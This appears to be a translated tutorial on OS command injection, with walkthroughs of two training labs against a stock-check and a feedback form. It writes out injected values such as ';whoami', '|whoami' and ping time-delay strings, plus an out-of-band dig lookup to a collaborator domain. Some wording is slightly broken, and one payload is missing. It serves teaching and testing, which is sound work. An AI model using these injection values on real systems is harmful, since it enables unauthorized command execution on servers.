II. Analysis and exploitation of OS command injection vulnerabilities (continued)
3. Common OS command injection vulnerabilities
Consider a shopping website that includes a function to check the amount of products left in stock with the following URL:
https://insecure-website.com/stockStatus?productID=381&storeID=29
In it, the website uses the productID
and storeID
passed in the shell statement as follows:
stockreport.pl 381 29
The command will return the result in the user interface. Note that here, the two parameters productID
and storeID
can be changed by the user, so we can take advantage of this mechanism to create a Command injection attack. An attacker can pass the productID
parameter the value & echo aiwefwlguh &
. Then the shell statement becomes:
stockreport.pl & echo aiwefwlguh & 29
As we discussed about the &
character above, the above command is actually three commands that execute simultaneously: stockreport.pl
, echo aiwefwlguh
and 29
. Then in the interface returns the following results:
1 2 3 4 | Error - productID was not provided aiwefwlguh 29: command not found |
In the first line, the stockreport.pl
command failed due to missing parameters, the second command executed successfully, the third 29
was not found, resulting in an error . We only need to care about the result of the second command, the string aiwefwlguh
returned means that the echo
command executed successfully. We confirm here that it is possible to exploit the Command injection vulnerability.
Analyze lab OS command injection, simple case
Description: The website contains a Command injection vulnerability in the function to check the remaining quantity of products. Knowing that the system uses the productId
and storeId
parameters, the user request returns the result after executing the shell command at the server. To solve the lab, we need to execute the whoami
command which returns the current user in the server.
In the product detail view, the Check stock function allows users to check the number of orders left in stock.
Observe the request in Burp Suite:
We see that the request uses the POST method passing to the system two parameters productId
and storeId
. These two values can be changed arbitrarily by the user.
Because the system directly passes these parameter values to the shell command, we can change the value to execute arbitrary shell commands, for example: Execute command id
see user ID (uid), group ID groups (gid) and the groups to which they are members.
Now, after executing the shell command to get the results of the remaining products, the system simultaneously executes the id
command and returns the result uid=12001(peter-CUXeyH) gid=12001(peter) groups=12001(peter)
:
Some payloads we can use:
- Payload 1: Use
;
interrupt, then executewhoami
:productId=1&storeId=1;whoami
- Payload 2: Stop the order with
|
:productId=1&storeId=1|whoami
- Payload 3: Interrupt command with
%0d
:
There are many other payloads for you to learn!
4. Blind OS command injection vulnerability
In the process of learning how to operate functions that can lead to OS command injection vulnerabilities above, we see that there are some functions that will return results at the browser interface, and some functions only execute the command. but does not return results, but displays results indirectly through other data logging commands. In fact, OS Command injection vulnerability is the same, not always the website will return the shell command we inject as clearly as in the above case. However, it cannot be denied that there is no OS Command injection vulnerability. This type of vulnerability is called Blind OS command injection vulnerabilities .
Consider a website that contains a function that allows users to fill in personal information when placing an order, in which the user enters an email address and a successful order notification will be replied to their email. To do this, the website executes a mailing program that takes as input an email from the user as follows:
mail -s "Content of Email" -aFrom:peter@normal-user.net notification@vulnerable-website.com
Of course in this case will not respond to the results of shell commands injected by the user. So the question is, how to check, or are there any signs to help us identify this type of “blind” vulnerability?
5. Check for Blind OS command injection vulnerabilities with time delays
We can test this vulnerability by using a command after inject that will cause the system response to contain a time delay. Thereby by observing allows us to confirm that the command was executed based on the application delay and response time. The ping
command is definitely a good choice in this case:
& ping -c 10 127.0.0.1 &
The above command line example will cause the application to ping to localhost in
ten ten seconds.
Lab analysis Blind OS command injection with time delays
Description: The website contains a blind Command injection vulnerability in the user feedback function, but the output is not displayed. Know that the system executes shell commands at the server with user input parameters. To solve the lab, we need to exploit a vulnerability that causes the system to be delayed in
ten ten seconds.
The Submit feedback function allows users to enter name
, email
, subject
, message messsage
. These values are passed to the system via the POST method:
To check if the system has a Command injection vulnerability, we can use the dig
command to perform a DNS lookup to check the response from the server. Multiple domains can be used for free. Here I use Burp Collaborator, with domain name: 8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net
, add ;dig+8s1uu77drmsnrws11qcmew82nttrhg.burpcollaborator.net
after each parameter to check:
The email
parameter returns a successful DNS lookup. Thus the email
value is used in the shell command at the server. Can use the ping
command to cause deley
ten ten seconds system:
Payload: email=hacker%40gmail.com||ping+-c+10+127.0.0.1||